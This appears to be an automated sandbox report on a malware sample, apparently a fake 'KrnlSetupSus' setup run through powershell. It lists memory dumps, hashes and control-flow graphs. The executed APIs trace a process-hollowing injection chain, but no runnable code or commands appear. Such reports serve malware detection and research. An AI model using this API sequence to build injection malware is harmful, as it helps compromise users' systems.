                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 07defd77994688c755810afda0a25c0ffa12a24606cdf83dde5927310275f6d2
                                                                                                                                  • Instruction ID: 7eead4b431440da6679ff9f121a68c2de1e00f0c240fa18f9885a9d053860c49
                                                                                                                                  • Opcode Fuzzy Hash: 07defd77994688c755810afda0a25c0ffa12a24606cdf83dde5927310275f6d2
                                                                                                                                  • Instruction Fuzzy Hash: 5DE0C971651A8086F7049B63D81879977E2EB88B5AFC58024898907350EF7DD4D98750
                                                                                                                                  Function 1C561000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561006
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561015
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561028
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561037
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: eadbd12235937c124a537099a0d2582e71b605cbd5e71cee349a5036ffe7fc67
                                                                                                                                  • Instruction ID: 5a0c0df5070f0d7a326ad1c54272c8f1dbf41e9c5fd70d9739b01eb045b5a5d7
                                                                                                                                  • Opcode Fuzzy Hash: eadbd12235937c124a537099a0d2582e71b605cbd5e71cee349a5036ffe7fc67
                                                                                                                                  • Instruction Fuzzy Hash: 20E0E571651A8086F7089B63D80879977A2FB88B1AFC88024C94907720EE38A4D98A10

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:5.6%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:27
                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                  execution_graph 14821 7ffb4adf0ff4 14822 7ffb4adf0ffd NtResumeThread 14821->14822 14824 7ffb4adf10b4 14822->14824 14805 7ffb4adeedc1 14806 7ffb4adeedf3 MapViewOfFile 14805->14806 14808 7ffb4adeee63 14806->14808 14809 7ffb4adee7e1 14810 7ffb4adee81a K32GetModuleInformation 14809->14810 14812 7ffb4adee882 14810->14812 14813 7ffb4adf0661 14814 7ffb4adf06c4 CreateProcessA 14813->14814 14816 7ffb4adf0960 14814->14816 14825 7ffb4adf0a91 14826 7ffb4adf0abe NtUnmapViewOfSection 14825->14826 14828 7ffb4adf0b1a 14826->14828 14829 7ffb4adeeb51 14830 7ffb4adeeba4 CreateFileMappingW 14829->14830 14832 7ffb4adeecc9 14830->14832 14833 7ffb4adf0f30 14834 7ffb4adf0f3f NtSetContextThread 14833->14834 14836 7ffb4adf0fca 14834->14836 14837 7ffb4adf0c6d 14838 7ffb4adf0c7b NtWriteVirtualMemory 14837->14838 14840 7ffb4adf0d47 14838->14840 14817 7ffb4adee8bc 14818 7ffb4adee8c5 CreateFileA 14817->14818 14820 7ffb4adeea5c 14818->14820

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFB4ADF0C6D Relevance: 1.6, APIs: 1, Instructions: 129nativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1402 7ffb4adf0c6d-7ffb4adf0c79 1403 7ffb4adf0c84-7ffb4adf0cf8 1402->1403 1404 7ffb4adf0c7b-7ffb4adf0c83 1402->1404 1408 7ffb4adf0cfa-7ffb4adf0cff 1403->1408 1409 7ffb4adf0d02-7ffb4adf0d45 NtWriteVirtualMemory 1403->1409 1404->1403 1408->1409 1410 7ffb4adf0d47 1409->1410 1411 7ffb4adf0d4d-7ffb4adf0d6a 1409->1411 1410->1411
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryVirtualWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3527976591-0
                                                                                                                                  • Opcode ID: d8022b8f11740593737fedd8175d26bd9a814917a9751ff23db71c1fc82d6ed3
                                                                                                                                  • Instruction ID: 4ff8b714f7d30982d433bfd5ef2a929c52f14cb450425bce7285471fae775998
                                                                                                                                  • Opcode Fuzzy Hash: d8022b8f11740593737fedd8175d26bd9a814917a9751ff23db71c1fc82d6ed3
                                                                                                                                  • Instruction Fuzzy Hash: 5431F37190CB4C8FDB18EF68D8856E9BBE4FF59321F04426EE049D3652CB74A806CB85
                                                                                                                                  Function 00007FFB4ADF0FF4 Relevance: 1.6, APIs: 1, Instructions: 114nativethreadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1412 7ffb4adf0ff4-7ffb4adf0ffb 1413 7ffb4adf1006-7ffb4adf10b2 NtResumeThread 1412->1413 1414 7ffb4adf0ffd-7ffb4adf1005 1412->1414 1418 7ffb4adf10ba-7ffb4adf10d6 1413->1418 1419 7ffb4adf10b4 1413->1419 1414->1413 1419->1418
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: d59c8a1b92e188c539094089bdfe50cf9d61ec91faeb9a7dd51838141f83f117
                                                                                                                                  • Instruction ID: b33e8206bf5e59112d2874f649c8af5c5ceedefcc893c73d4d4113fffcedddb3
                                                                                                                                  • Opcode Fuzzy Hash: d59c8a1b92e188c539094089bdfe50cf9d61ec91faeb9a7dd51838141f83f117
                                                                                                                                  • Instruction Fuzzy Hash: 4B31F671A0CA4C8FDB58DFA8D8457E9BBE1EF5A310F0441ABE40DD3256CB74A806CB91
                                                                                                                                  Function 00007FFB4ADF0F30 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1431 7ffb4adf0f30-7ffb4adf0fc8 NtSetContextThread 1435 7ffb4adf0fca 1431->1435 1436 7ffb4adf0fd0-7ffb4adf0fec 1431->1436 1435->1436
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1591575202-0
                                                                                                                                  • Opcode ID: 6724d31f35413658519cb4f6a139554120b46ab5830a095a4966f2017163d11e
                                                                                                                                  • Instruction ID: f214bc3c66f0ce460d79c309686d741d4ab143cea54e1ba0594511eed38b449b
                                                                                                                                  • Opcode Fuzzy Hash: 6724d31f35413658519cb4f6a139554120b46ab5830a095a4966f2017163d11e
                                                                                                                                  • Instruction Fuzzy Hash: 1721D670A0CB4C8FDB58DF98D8857E97BF0EB55320F04416BD049D3252C6749856CB91
                                                                                                                                  Function 00007FFB4ADF0A91 Relevance: 1.6, APIs: 1, Instructions: 88nativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1437 7ffb4adf0a91-7ffb4adf0b18 NtUnmapViewOfSection 1440 7ffb4adf0b1a 1437->1440 1441 7ffb4adf0b20-7ffb4adf0b3c 1437->1441 1440->1441
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SectionUnmapView
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 498011366-0
                                                                                                                                  • Opcode ID: fba6d3fc615438c20293242f99c38556cba4ab6c0c90a443914025550b723f40
                                                                                                                                  • Instruction ID: 6820f9cb4ff2c06db3a080ed118a05906d5d57ee0e7b9e35fe42f65ad4186bff
                                                                                                                                  • Opcode Fuzzy Hash: fba6d3fc615438c20293242f99c38556cba4ab6c0c90a443914025550b723f40
                                                                                                                                  • Instruction Fuzzy Hash: 68218671A08A0C8FDB58EF5CD88A7E9B7E0EB59321F04416ED40DD3256D770A855CB91
                                                                                                                                  Function 00007FFB4AEB0000 Relevance: 3.6, Instructions: 3619COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518799582.00007FFB4AEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4aeb0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5c5f256a2d3e998485782b4853732c5ee7b2e7b5335ea3d4ece9b3eb1673efb6
                                                                                                                                  • Instruction ID: a777395c286b15e0903b26789d20409b66bf50bb5d690df6e47fb17751ea9b46
                                                                                                                                  • Opcode Fuzzy Hash: 5c5f256a2d3e998485782b4853732c5ee7b2e7b5335ea3d4ece9b3eb1673efb6
                                                                                                                                  • Instruction Fuzzy Hash: 1243B171A0CB858FEB65EF28C495A6577D0FFA9700F2505AED489C7297DE20EC42CB81
                                                                                                                                  Function 00007FFB4AEB011C Relevance: 3.4, Instructions: 3380COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518799582.00007FFB4AEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4aeb0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 53a909690d64b76f4ca9d24f90bb5fc851a9b7e922b4e29801851a9ced08e9b8
                                                                                                                                  • Instruction ID: 52f97cd65203082f693c6762f635a5769255cfadc53041915cd26faa741bd51c
                                                                                                                                  • Opcode Fuzzy Hash: 53a909690d64b76f4ca9d24f90bb5fc851a9b7e922b4e29801851a9ced08e9b8
                                                                                                                                  • Instruction Fuzzy Hash: 3833AE71A1CB498FEB65EF28C495A6577E0FFA9700F2405ADD489C7297DE20EC42CB81
                                                                                                                                  Function 00007FFB4AEB00DD Relevance: 3.2, Instructions: 3225COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518799582.00007FFB4AEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4aeb0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 908f3b712e4268c54c38252ab82d2380e528daf231db151f1a1c21cf47e5797c
                                                                                                                                  • Instruction ID: 01711bc554d6c99f112bfeea8d64dde8b5b0bb15234d063a8cc4852eb899c482
                                                                                                                                  • Opcode Fuzzy Hash: 908f3b712e4268c54c38252ab82d2380e528daf231db151f1a1c21cf47e5797c
                                                                                                                                  • Instruction Fuzzy Hash: FC33AE71A1CB498FEB65EF28C495A6577E0FFA8700F2405ADD489C7296DE20FC42CB85
                                                                                                                                  Function 00007FFB4ADF0661 Relevance: 1.9, APIs: 1, Instructions: 355processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1323 7ffb4adf0661-7ffb4adf0702 1326 7ffb4adf0704-7ffb4adf0713 1323->1326 1327 7ffb4adf0760-7ffb4adf0792 1323->1327 1326->1327 1328 7ffb4adf0715-7ffb4adf0718 1326->1328 1334 7ffb4adf0794-7ffb4adf07a3 1327->1334 1335 7ffb4adf07f0-7ffb4adf0841 1327->1335 1329 7ffb4adf071a-7ffb4adf072d 1328->1329 1330 7ffb4adf0752-7ffb4adf075a 1328->1330 1332 7ffb4adf0731-7ffb4adf0744 1329->1332 1333 7ffb4adf072f 1329->1333 1330->1327 1332->1332 1336 7ffb4adf0746-7ffb4adf074e 1332->1336 1333->1332 1334->1335 1337 7ffb4adf07a5-7ffb4adf07a8 1334->1337 1341 7ffb4adf0843-7ffb4adf0852 1335->1341 1342 7ffb4adf089f-7ffb4adf08d0 1335->1342 1336->1330 1339 7ffb4adf07aa-7ffb4adf07bd 1337->1339 1340 7ffb4adf07e2-7ffb4adf07ea 1337->1340 1343 7ffb4adf07c1-7ffb4adf07d4 1339->1343 1344 7ffb4adf07bf 1339->1344 1340->1335 1341->1342 1346 7ffb4adf0854-7ffb4adf0857 1341->1346 1350 7ffb4adf08d2-7ffb4adf08da 1342->1350 1351 7ffb4adf08de-7ffb4adf095e CreateProcessA 1342->1351 1343->1343 1345 7ffb4adf07d6-7ffb4adf07de 1343->1345 1344->1343 1345->1340 1347 7ffb4adf0859-7ffb4adf086c 1346->1347 1348 7ffb4adf0891-7ffb4adf0899 1346->1348 1352 7ffb4adf0870-7ffb4adf0883 1347->1352 1353 7ffb4adf086e 1347->1353 1348->1342 1350->1351 1354 7ffb4adf0966-7ffb4adf09a3 call 7ffb4adf09bf 1351->1354 1355 7ffb4adf0960 1351->1355 1352->1352 1356 7ffb4adf0885-7ffb4adf088d 1352->1356 1353->1352 1359 7ffb4adf09aa-7ffb4adf09be 1354->1359 1360 7ffb4adf09a5 1354->1360 1355->1354 1356->1348 1360->1359
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: b21d8c78c8eaa98a4100d1a664a2137ce840bbefd30832f90b9a11888c356664
                                                                                                                                  • Instruction ID: c0e4d1368f1b49dbcb2f0f9330024c28eca14d565248eb1bc8820175c4d85937
                                                                                                                                  • Opcode Fuzzy Hash: b21d8c78c8eaa98a4100d1a664a2137ce840bbefd30832f90b9a11888c356664
                                                                                                                                  • Instruction Fuzzy Hash: 5CB19570618A4D8FEB68EF28D8467EA77D1FB58311F10426EEC4DC7291DB74A5818BC2
                                                                                                                                  Function 00007FFB4ADEE8BC Relevance: 1.7, APIs: 1, Instructions: 226fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1361 7ffb4adee8bc-7ffb4adee8c3 1362 7ffb4adee8c5-7ffb4adee8cd 1361->1362 1363 7ffb4adee8ce-7ffb4adee967 1361->1363 1362->1363 1367 7ffb4adee969-7ffb4adee978 1363->1367 1368 7ffb4adee9c2-7ffb4adeea5a CreateFileA 1363->1368 1367->1368 1369 7ffb4adee97a-7ffb4adee97d 1367->1369 1375 7ffb4adeea62-7ffb4adeea9e call 7ffb4adeeaba 1368->1375 1376 7ffb4adeea5c 1368->1376 1370 7ffb4adee9b7-7ffb4adee9bf 1369->1370 1371 7ffb4adee97f-7ffb4adee992 1369->1371 1370->1368 1373 7ffb4adee996-7ffb4adee9a9 1371->1373 1374 7ffb4adee994 1371->1374 1373->1373 1377 7ffb4adee9ab-7ffb4adee9b3 1373->1377 1374->1373 1381 7ffb4adeeaa5-7ffb4adeeab9 1375->1381 1382 7ffb4adeeaa0 1375->1382 1376->1375 1377->1370 1382->1381
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 12a4c27ae9b6715851b94f1917f7dd941972b107f0b58b6b4cfa245d3cbbf2b1
                                                                                                                                  • Instruction ID: 911fc704f2e79a6d01194ab0c1b0cdf0752a087dc7935773023d0e500ae6c5e3
                                                                                                                                  • Opcode Fuzzy Hash: 12a4c27ae9b6715851b94f1917f7dd941972b107f0b58b6b4cfa245d3cbbf2b1
                                                                                                                                  • Instruction Fuzzy Hash: B061F77091CB8D8FEB58EF28DC457E97BE0FB59310F14426AE84DC3252CA74E8418B92
                                                                                                                                  Function 00007FFB4ADEEB51 Relevance: 1.7, APIs: 1, Instructions: 215COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1383 7ffb4adeeb51-7ffb4adeebef 1386 7ffb4adeec4a-7ffb4adeecc7 CreateFileMappingW 1383->1386 1387 7ffb4adeebf1-7ffb4adeec00 1383->1387 1394 7ffb4adeecc9 1386->1394 1395 7ffb4adeeccf-7ffb4adeed0b call 7ffb4adeed27 1386->1395 1387->1386 1388 7ffb4adeec02-7ffb4adeec05 1387->1388 1389 7ffb4adeec07-7ffb4adeec1a 1388->1389 1390 7ffb4adeec3f-7ffb4adeec47 1388->1390 1392 7ffb4adeec1e-7ffb4adeec31 1389->1392 1393 7ffb4adeec1c 1389->1393 1390->1386 1392->1392 1396 7ffb4adeec33-7ffb4adeec3b 1392->1396 1393->1392 1394->1395 1400 7ffb4adeed12-7ffb4adeed26 1395->1400 1401 7ffb4adeed0d 1395->1401 1396->1390 1401->1400
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileMapping
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 524692379-0
                                                                                                                                  • Opcode ID: 4a1c3639e3cf8a9aa8688fab89ea7dbdd658ce8662e2e420601735b85a03d117
                                                                                                                                  • Instruction ID: 74974a9ca44ee43e4163f9f818573719f182cd283a6cbb35153d02d90046194b
                                                                                                                                  • Opcode Fuzzy Hash: 4a1c3639e3cf8a9aa8688fab89ea7dbdd658ce8662e2e420601735b85a03d117
                                                                                                                                  • Instruction Fuzzy Hash: 2D518270618A8C9FEB58EF2CD8467E977E1FB58311F14426AE84EC3251DE75E8418B81
                                                                                                                                  Function 00007FFB4ADEE7E1 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1420 7ffb4adee7e1-7ffb4adee880 K32GetModuleInformation 1423 7ffb4adee888-7ffb4adee8b7 1420->1423 1424 7ffb4adee882 1420->1424 1424->1423
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InformationModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3425974696-0
                                                                                                                                  • Opcode ID: 18705f005979156a8f7f0d15c66d6fdc21de42a178d7e73a8d376210e0e5039c
                                                                                                                                  • Instruction ID: fffe78858cd21867e1e9b0b10111e9c43a3195a9e55bead125327e2435ae6184
                                                                                                                                  • Opcode Fuzzy Hash: 18705f005979156a8f7f0d15c66d6fdc21de42a178d7e73a8d376210e0e5039c
                                                                                                                                  • Instruction Fuzzy Hash: 6531E871908A1C9FDB18EF9CD8496F9B7E1FBA9311F10426FD009D3651CB746856CB81
                                                                                                                                  Function 00007FFB4ADEEDC1 Relevance: 1.6, APIs: 1, Instructions: 102fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1426 7ffb4adeedc1-7ffb4adeee61 MapViewOfFile 1429 7ffb4adeee69-7ffb4adeee86 1426->1429 1430 7ffb4adeee63 1426->1430 1430->1429
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.1518046740.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffb4ade0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileView
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3314676101-0
                                                                                                                                  • Opcode ID: aee6d93f0523b90c0af8f9ddb754fb0974d726fd4bd57f8e63aac60b13a164f0
                                                                                                                                  • Instruction ID: 22ffae644b87ff164fa5f9278c542ad85e95cb57a7a8a4f0b73abd7023cace65
                                                                                                                                  • Opcode Fuzzy Hash: aee6d93f0523b90c0af8f9ddb754fb0974d726fd4bd57f8e63aac60b13a164f0
                                                                                                                                  • Instruction Fuzzy Hash: CB21A23191CA4C9FDB18EB5CD8466F9B7E1FB99321F10422ED049D3252CB71A8568B81
                                                                                                                                  Function 00007FFB4B08520F Relevance: .9, Instructions: 888COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1442 7ffb4b08520f-7ffb4b085264 1445 7ffb4b08526a-7ffb4b085274 1442->1445 1446 7ffb4b085344-7ffb4b0853f5 1442->1446 1447 7ffb4b08528d-7ffb4b085292 1445->1447 1448 7ffb4b085276-7ffb4b085283 1445->1448 1476 7ffb4b0853f8-7ffb4b085409 1446->1476 1477 7ffb4b0853f7 1446->1477 1449 7ffb4b0852e5-7ffb4b0852ef 1447->1449 1450 7ffb4b085294-7ffb4b085297 1447->1450 1448->1447 1455 7ffb4b085285-7ffb4b08528b 1448->1455 1456 7ffb4b0852f1-7ffb4b0852fd 1449->1456 1457 7ffb4b0852fe-7ffb4b085341 1449->1457 1450->1449 1453 7ffb4b085299-7ffb4b08529c 1450->1453 1453->1449 1459 7ffb4b08529e-7ffb4b0852a8 1453->1459 1455->1447 1457->1446 1459->1449 1466 7ffb4b0852aa-7ffb4b0852be 1459->1466 1471 7ffb4b0852c0-7ffb4b0852cd 1466->1471 1472 7ffb4b0852d7-7ffb4b0852e4 1466->1472 1471->1472 1475 7ffb4b0852cf-7ffb4b0852d5 1471->1475 1475->1472 1478 7ffb4b08540c-7ffb4b085494 1476->1478 1479 7ffb4b08540b 1476->1479 1477->1476 1484 7ffb4b08559d-7ffb4b0855f7 1478->1484 1485 7ffb4b08549a-7ffb4b0854a4 1478->1485 1479->1478 1510 7ffb4b085622-7ffb4b08564d 1484->1510 1511 7ffb4b0855f9-7ffb4b085620 1484->1511 1486 7ffb4b0854bd-7ffb4b0854c2 1485->1486 1487 7ffb4b0854a6-7ffb4b0854b3 1485->1487 1490 7ffb4b08553e-7ffb4b085548 1486->1490 1491 7ffb4b0854c4-7ffb4b0854c7 1486->1491 1487->1486 1493 7ffb4b0854b5-7ffb4b0854bb 1487->1493 1494 7ffb4b08554a-7ffb4b085556 1490->1494 1495 7ffb4b085557-7ffb4b08559a 1490->1495 1496 7ffb4b0854ee-7ffb4b0854f2 1491->1496 1497 7ffb4b0854c9-7ffb4b0854e0 1491->1497 1493->1486 1495->1484 1496->1490 1502 7ffb4b0854f4-7ffb4b0854f7 1496->1502 1502->1490 1507 7ffb4b0854f9-7ffb4b0854fc 1502->1507 1507->1490 1509 7ffb4b0854fe-7ffb4b085508 1507->1509 1509->1490 1517 7ffb4b08550a-7ffb4b08553d 1509->1517 1521 7ffb4b085650-7ffb4b085661 1510->1521 1522 7ffb4b08564f 1510->1522 1511->1510 1523 7ffb4b085664-7ffb4b085681 1521->1523 1524 7ffb4b085663 1521->1524 1522->1521 1526 7ffb4b085684-7ffb4b0856f7 1523->1526 1527 7ffb4b085683 1523->1527 1524->1523 1532 7ffb4b08584f-7ffb4b08588c 1526->1532 1533 7ffb4b0856fd-7ffb4b085707 1526->1533 1527->1526 1547 7ffb4b0858af 1532->1547 1548 7ffb4b08588e 1532->1548 1534 7ffb4b085709-7ffb4b085721 1533->1534 1535 7ffb4b085723-7ffb4b085730 1533->1535 1534->1535 1541 7ffb4b0857f0-7ffb4b0857fa 1535->1541 1542 7ffb4b085736-7ffb4b085739 1535->1542 1544 7ffb4b0857fc-7ffb4b085808 1541->1544 1545 7ffb4b085809-7ffb4b08584c 1541->1545 1542->1541 1546 7ffb4b08573f-7ffb4b085747 1542->1546 1545->1532 1546->1532 1551 7ffb4b08574d-7ffb4b085757 1546->1551 1550 7ffb4b0858b0-7ffb4b0858d2 1547->1550 1552 7ffb4b085890-7ffb4b0858a9 1548->1552 1553 7ffb4b0858ef-7ffb4b085901 1548->1553 1569 7ffb4b0858d4-7ffb4b0858eb 1550->1569 1555 7ffb4b085770-7ffb4b085774 1551->1555 1556 7ffb4b085759-7ffb4b08576e 1551->1556 1568 7ffb4b0858ab-7ffb4b0858ae 1552->1568 1552->1569 1557 7ffb4b085904-7ffb4b085915 